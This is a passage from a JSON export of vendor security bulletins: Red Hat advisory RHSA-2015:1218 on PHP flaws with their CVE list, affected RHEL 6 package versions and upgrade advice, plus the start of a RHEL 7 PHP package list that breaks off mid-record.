"5.3.3-46.el6_6", "arch": "i686", "packageName": "php-snmp", "packageFilename": "php-snmp-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-fpm", "packageFilename": "php-fpm-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-pgsql", "packageFilename": "php-pgsql-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-mbstring", "packageFilename": "php-mbstring-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-zts", "packageFilename": "php-zts-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-enchant", "packageFilename": "php-enchant-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-common", "packageFilename": "php-common-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-xml", "packageFilename": "php-xml-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-gd", "packageFilename": "php-gd-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-bcmath", "packageFilename": "php-bcmath-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-intl", "packageFilename": "php-intl-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-imap", "packageFilename": "php-imap-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-dba", "packageFilename": "php-dba-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-odbc", "packageFilename": "php-odbc-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-pspell", "packageFilename": "php-pspell-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-ldap", "packageFilename": "php-ldap-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php", "packageFilename": "php-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-recode", "packageFilename": "php-recode-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-process", "packageFilename": "php-process-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-cli", "packageFilename": "php-cli-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-mbstring", "packageFilename": "php-mbstring-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-devel", "packageFilename": "php-devel-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-mysql", "packageFilename": "php-mysql-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-pgsql", "packageFilename": "php-pgsql-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-soap", "packageFilename": "php-soap-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-snmp", "packageFilename": "php-snmp-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-embedded", "packageFilename": "php-embedded-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-pdo", "packageFilename": "php-pdo-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-fpm", "packageFilename": "php-fpm-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-zts", "packageFilename": "php-zts-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-tidy", "packageFilename": "php-tidy-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-debuginfo", "packageFilename": "php-debuginfo-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-imap", "packageFilename": "php-imap-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-enchant", "packageFilename": "php-enchant-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-embedded", "packageFilename": "php-embedded-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-mbstring", "packageFilename": "php-mbstring-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-snmp", "packageFilename": "php-snmp-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-fpm", "packageFilename": "php-fpm-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-recode", "packageFilename": "php-recode-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-devel", "packageFilename": "php-devel-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-process", "packageFilename": "php-process-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-tidy", "packageFilename": "php-tidy-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-intl", "packageFilename": "php-intl-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-pspell", "packageFilename": "php-pspell-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-dba", "packageFilename": "php-dba-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-bcmath", "packageFilename": "php-bcmath-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-zts", "packageFilename": "php-zts-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-gd", "packageFilename": "php-gd-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-common", "packageFilename": "php-common-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-ldap", "packageFilename": "php-ldap-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-mysql", "packageFilename": "php-mysql-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-pdo", "packageFilename": "php-pdo-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-soap", "packageFilename": "php-soap-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-xml", "packageFilename": "php-xml-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-pgsql", "packageFilename": "php-pgsql-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php", "packageFilename": "php-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-odbc", "packageFilename": "php-odbc-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "ppc64", "packageName": "php-cli", "packageFilename": "php-cli-5.3.3-46.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-debuginfo", "packageFilename": "php-debuginfo-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-recode", "packageFilename": "php-recode-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-devel", "packageFilename": "php-devel-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-pspell", "packageFilename": "php-pspell-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-bcmath", "packageFilename": "php-bcmath-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-fpm", "packageFilename": "php-fpm-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-process", "packageFilename": "php-process-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-enchant", "packageFilename": "php-enchant-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-tidy", "packageFilename": "php-tidy-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-imap", "packageFilename": "php-imap-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-embedded", "packageFilename": "php-embedded-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-mbstring", "packageFilename": "php-mbstring-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-dba", "packageFilename": "php-dba-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-intl", "packageFilename": "php-intl-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-zts", "packageFilename": "php-zts-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-snmp", "packageFilename": "php-snmp-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-common", "packageFilename": "php-common-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-pgsql", "packageFilename": "php-pgsql-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php", "packageFilename": "php-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-gd", "packageFilename": "php-gd-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-xml", "packageFilename": "php-xml-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-ldap", "packageFilename": "php-ldap-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-pdo", "packageFilename": "php-pdo-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-soap", "packageFilename": "php-soap-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-cli", "packageFilename": "php-cli-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-odbc", "packageFilename": "php-odbc-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "s390x", "packageName": "php-mysql", "packageFilename": "php-mysql-5.3.3-46.el6_6.s390x.rpm", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2015-0273, CVE-2015-2787, CVE-2015-4147,\nCVE-2015-4148, CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602,\nCVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-4026, CVE-2015-3411, CVE-2015-3412,\nCVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA double free flaw was found in zend_ts_hash_graceful_destroy() function in\nthe PHP ZTS module. This flaw could possibly cause a PHP application to\ncrash. (CVE-2014-9425)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n", "reporter": "RedHat", "published": "2015-07-09T04:00:00", "type": "redhat", "title": "(RHSA-2015:1218) Moderate: php security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-9425", "CVE-2014-9705", "CVE-2014-9709", "CVE-2015-0232", "CVE-2015-0273", "CVE-2015-2301", "CVE-2015-2783", "CVE-2015-2787", "CVE-2015-3307", "CVE-2015-3329", "CVE-2015-3411", "CVE-2015-3412", "CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4024", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-4148", "CVE-2015-4598", "CVE-2015-4599", "CVE-2015-4600", "CVE-2015-4601", "CVE-2015-4602", "CVE-2015-4603"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T08:58:11", "id": "RHSA-2015:1218", "href": "https://access.redhat.com/errata/RHSA-2015:1218", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-15T16:22:08", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-debuginfo", "packageFilename": "php-debuginfo-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php", "packageFilename": "php-5.4.16-36.el7_1.src.rpm", "arch": "src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-gd", "packageFilename": "php-gd-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-cli", "packageFilename": "php-cli-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-pspell", "packageFilename": "php-pspell-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-fpm", "packageFilename": "php-fpm-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-ldap", "packageFilename": "php-ldap-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php", "packageFilename": "php-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-common", "packageFilename": "php-common-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-odbc", "packageFilename": "php-odbc-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-xml", "packageFilename": "php-xml-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-dba", "packageFilename": "php-dba-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-process", "packageFilename": "php-process-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-mysql", "packageFilename": "php-mysql-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-intl", "packageFilename": "php-intl-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-embedded", "packageFilename": "php-embedded-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-pdo", "packageFilename": "php-pdo-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-recode", "packageFilename": "php-recode-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-mysqlnd", "packageFilename": "php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-bcmath", "packageFilename": "php-bcmath-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-soap", "packageFilename": "php-soap-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-devel", "packageFilename": "php-devel-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-mbstring", "packageFilename": "php-mbstring-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-enchant", "packageFilename": "php-enchant-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-snmp", "packageFilename": "php-snmp-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-pgsql", "packageFilename": "php-pgsql-5.4.16-36.el7_1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-debuginfo", "packageFilename": "php-debuginfo-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-enchant", "packageFilename": "php-enchant-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-mysqlnd", "packageFilename": "php-mysqlnd-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-pspell", "packageFilename": "php-pspell-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-bcmath", "packageFilename": "php-bcmath-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-intl", "packageFilename": "php-intl-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-snmp", "packageFilename": "php-snmp-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": 